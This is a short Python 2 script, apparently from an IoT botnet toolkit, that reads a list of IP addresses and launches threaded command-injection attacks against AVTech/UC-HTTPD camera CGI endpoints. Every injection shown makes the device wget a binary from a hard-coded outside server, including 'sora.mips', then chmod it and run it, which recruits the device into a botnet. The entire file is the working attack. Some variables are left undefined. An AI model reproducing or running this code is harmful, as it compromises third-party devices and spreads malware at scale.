TL-BOTS/TL.EXPLOIT_SCAN/EXPLOIT.uchttpd/avte.py

#! python !#
import threading, sys, time, random, socket, subprocess, re, os, base64, struct, array, requests
from threading import Thread
from time import sleep
import requests
from requests.auth import HTTPDigestAuth
from decimal import *	
ips = open(sys.argv[1], "r").readlines()
port = sys.argv[2]

send_data = overflow + "$(cd%20/tmp;%20wget%20http://x/%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)"

class rtek(threading.Thread):
		def __init__ (self, ip):
			threading.Thread.__init__(self)
			self.ip = str(ip).rstrip('\n')
		def run(self):
			try:
				print "[UC-HTTPD] Loading - " + self.ip
				cmd = "cd%20/tmp;%20wget%20http://185.116.212.88/bins/sora.mips%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd Avtech"
				data = 'DoShellCmd "strCmd=$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&"'
				data2 = 'action=white_led&brightness=$(' + cmd + '  2>%261) #'
				
				url = "http://" + self.ip + ":"+port+"/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin"
				url2 = "http://" + self.ip + ":"+port+"/cgi-bin/supervisor/CloudSetup.cgi?exefile=$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)"
				url3 = "http://" + self.ip + ":"+port+"/cgi-bin/supervisor/adcommand.cgi"
				url4 = "http://" + self.ip + ":"+port+"/cgi-bin/supervisor/Factory.cgi"
                               
				requests.get(url, timeout=3)
				requests.get(url2, timeout=3)
				requests.post(url3, timeout=3, data=data)
				requests.post(url4, timeout=3, data=data2, headers=headers)

			except Exception as e:
				pass
for ip in ips:
	try:
		n = rtek(ip)
		n.start()
		time.sleep(0.03)
	except:
		pass